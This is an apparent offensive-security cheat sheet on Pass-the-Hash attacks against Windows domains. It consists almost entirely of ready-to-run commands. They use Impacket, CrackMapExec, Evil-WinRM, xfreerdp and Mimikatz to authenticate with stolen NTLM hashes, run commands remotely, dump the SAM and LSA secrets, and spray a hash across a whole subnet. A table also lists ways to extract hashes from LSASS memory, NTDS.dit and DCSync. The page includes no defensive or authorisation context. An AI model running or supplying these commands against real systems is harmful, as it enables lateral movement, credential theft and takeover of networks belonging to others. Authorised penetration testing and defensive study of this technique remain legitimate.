> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Pass-the-Hash

> Pass-the-Hash: authenticate with NTLM hash without knowing the plaintext password.

## Overview

Use NTLM hash directly for authentication. No need to crack. Works with SMB, WinRM, RDP (restricted admin), WMI, etc.

***

## Impacket

```bash theme={"dark"}
impacket-psexec DOMAIN/user@TARGET -hashes aad3b435b51404eeaad3b435b51404ee:NTLM_HASH
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-atexec DOMAIN/user@TARGET -hashes :NTLM_HASH "whoami"
```

***

## CrackMapExec

```bash theme={"dark"}
crackmapexec smb TARGET -u user -H NTLM_HASH
crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"
crackmapexec smb TARGET -u user -H NTLM_HASH --sam          # Dump SAM
crackmapexec smb TARGET -u user -H NTLM_HASH --lsa          # Dump LSA
crackmapexec winrm TARGET -u user -H NTLM_HASH
```

***

## Evil-WinRM

```bash theme={"dark"}
evil-winrm -i TARGET -u user -H NTLM_HASH
```

***

## xfreerdp (RDP — Restricted Admin)

```bash theme={"dark"}
xfreerdp /v:TARGET /u:user /pth:NTLM_HASH
```

Requires Restricted Admin mode enabled on target.

***

## Mimikatz (Windows)

```cmd theme={"dark"}
sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:NTLM_HASH /run:cmd.exe
```

***

## Spray Hash Across Subnet

```bash theme={"dark"}
crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH
```

***

## Get the Hash

| Source       | Tool                      |
| ------------ | ------------------------- |
| SAM database | `secretsdump`, `reg save` |
| LSASS memory | `mimikatz`, `procdump`    |
| NTDS.dit     | `secretsdump`, `ntdsutil` |
| DCSync       | `secretsdump -just-dc`    |
| Cached creds | `mimikatz lsadump::cache` |

***

## Quick Reference

| Task     | Command                                         |
| -------- | ----------------------------------------------- |
| PsExec   | `impacket-psexec DOM/user@TARGET -hashes :HASH` |
| WinRM    | `evil-winrm -i TARGET -u user -H HASH`          |
| CME      | `crackmapexec smb TARGET -u user -H HASH`       |
| Mimikatz | `sekurlsa::pth /user:admin /ntlm:HASH`          |
| Spray    | `crackmapexec smb SUBNET -u admin -H HASH`      |
